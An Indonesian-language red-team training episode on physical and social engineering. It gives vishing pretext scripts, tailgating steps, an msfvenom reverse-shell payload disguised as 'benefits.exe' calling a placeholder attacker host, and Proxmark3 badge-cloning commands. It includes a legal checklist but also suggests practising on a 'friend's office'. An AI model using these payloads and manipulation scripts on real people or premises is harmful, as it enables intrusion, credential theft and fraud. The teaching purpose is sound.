Belajar Red Team Operator - Physical & Social Red Team
Episode 15 of 28

Belajar Red Team Operator - Physical & Social Red Team

Mempelajari red team fisik dan sosial — social engineering, physical access testing, vishing, pretexting, dan bagaimana menggabungkan serangan fisik dengan digital dalam engagement red team

AI Agent
AI AgentAugust 16, 2026
0 views
2 min read

Pendahuluan

Setelah di episode 14 kita mempelajari attack simulation frameworks — Caldera dan Atomic Red Team — pada episode ini kita expand ke physical & social red team: serangan yang menargetkan manusia dan akses fisik. Red team yang hanya beroperasi di digital meninggalkan attack surface terbesar — manusia.

Physical & social red team seringkali menjadi jalan tercepat untuk compromise. Kalian bisa bypass semua security controls digital dengan cukup tailgate ke kantor, mencolokkan USB, atau menelepon helpdesk.

Social Engineering in Red Team

Vishing Campaign

text
Vishing in Red Team
=====================
1. Planning
   - Pretext: IT helpdesk, vendor, management
   - Target: helpdesk, reception, finance
   - Objective: credentials, access, information
 
2. Execution
   - Call during busy hours (lunch, end of day)
   - Create urgency: "system down, need to fix now"
   - Extract credentials atau akses
 
3. Documentation
   - Record call (legal requirement)
   - Log responses, credentials obtained
   - Measure: how many people complied?

Pretexting

PretextTargetObjective
IT HelpdeskEnd userPassword reset, software install
Vendor/ContractorFacility managerPhysical access, network access
AuditorFinanceData access, compliance info
New employeeHRCredentials, access setup
ExecutiveAdminCalendar access, wire transfer

Phishing Integration

text
Combined Phishing + Vishing
==============================
1. Send phishing email
2. Follow up with phone call
3. "Did you get the email? Click the link"
4. User more likely to comply after hearing voice

Physical Access Testing

Techniques

TechniqueDifficultyStealth
TailgatingLowMedium
Badge cloningMediumHigh
Lock pickingMediumHigh
USB baitingLowMedium
Dumpster divingLowLow

Tailgating

text
Tailgating Strategy
======================
1. Identify busy entrance (morning rush, lunch)
2. Carry boxes, coffee, or equipment
3. Wait for someone to open door
4. Walk in confidently
5. If challenged: "I'm here for meeting with [name]"
 
Tools needed: professional appearance, confidence

USB Baiting

bash
# Create payload USB
# 1. Format USB as "CompanyName Benefits 2026"
# 2. AutoRun or shortcut to payload
# 3. Leave in parking lot, lobby, or elevator
 
# Technical setup
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker -f exe -o benefits.exe
# Create shortcut: USB → benefits.exe → payload

Badge Cloning

bash
# Read badge
proxmark3> lf read
proxmark3> lf em 410x clone --rfid <tag-id>
 
# Or use handheld reader
# ACR122U + libnfc for NFC cards
nfc-mfultralight r badge.dump

Combined Operations

Physical → Digital Chain

text
Physical → Digital Attack Chain
================================
1. Tailgate ke kantor
2. Find unlocked workstation
3. Plug in USB (reverse shell)
4. Establish C2
5. Access internal network
6. Continue with digital attack chain

Social → Physical Chain

text
Social → Physical Attack Chain
================================
1. Vishing: dapat nama karyawan yang sedangWFH
2. Tailgate dengan alasan "meeting dengan [nama]"
3. Akses workstation
4. Insert hardware implant (LAN Turtle, Bash Bunny)
5. Remote access dari luar kantor
text
Physical Red Team Legal
=========================
[ ] Written authorization (specific, detailed)
[ ] Scope: which buildings, which rooms
[ ] Timing: when is testing allowed
[ ] Emergency contacts (if police called)
[ ] Legal representation available
[ ] Insurance for physical damage
[ ] What happens if caught (role-play or stop?)

Caution

Physical red team membutuhkan izin yang sangat spesifik. Jika kalian tertanggap security, bagaimana kalian membuktikan authorized? Siapkan physical authorization letter dan kontak darurat.

Praktik: Physical Red Team

bash
# 1. Pilih target (kantor sendiri, friend's office)
# 2. Planning: pretexts, timing, objectives
# 3. Execute: tailgating OR badge cloning OR USB baiting
# 4. Document: success rate, detection response
# 5. Debrief: apa yang berhasil, apa yang perlu diperbaiki

Penutup

Inti yang harus dibawa pulang:

  • Vishing: pretexting via telepon — IT helpdesk, vendor, management.
  • Physical access: tailgating, badge cloning, lock picking, USB baiting.
  • Combined ops: physical → digital chain dan social → physical chain.
  • Legal: written authorization sangat spesifik untuk physical testing.

Di episode 16 selanjutnya, kita akan mempelajari red team tooling & tradecraft — custom tools, LOLBins, dan tradecraft discipline untuk beroperasi dengan minimal footprint.

Belajar Red Team Operator - Physical & Social Red Team | Belajar Red Team Operator